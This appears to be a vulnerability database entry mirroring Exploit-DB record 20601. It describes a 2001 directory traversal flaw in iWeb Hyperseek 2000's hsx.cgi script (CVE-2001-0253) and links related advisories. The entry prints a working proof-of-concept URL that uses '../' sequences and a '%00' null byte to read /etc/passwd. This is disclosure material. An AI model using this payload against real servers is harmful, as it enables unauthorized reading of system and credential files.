Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMC GaNEDB-ID:20601
HistoryJan 28, 2001 - 12:00 a.m.

iweb hyperseek 2000 - Directory Traversal

2001-01-2800:00:00
MC GaN
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/2314/info

A specially crafted URL, composed of '../' and '%00', will disclose the directory listing and files of the target with read permissions. 

http://target/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00

Related

nvd 1
nessus 1
cert 1
cvelist 1
cve 1
nvd
nvd
CVE-2001-0253
2001-06-02 04:00:00
nessus
nessus
iWeb Hyperseek 2000 hsx.cgi show Parameter Traversal Arbitrary File Read
2001-01-29 00:00:00
cert
cert
Hyperseek 2000 hsx.cgi does not adequately filter user input disclosing directory listings and file contents
2003-02-14 00:00:00
cvelist
cvelist
CVE-2001-0253
2001-04-04 04:00:00
cve
cve
CVE-2001-0253
2001-06-02 04:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:20601
nvd1nessus1cert1cvelist1cve1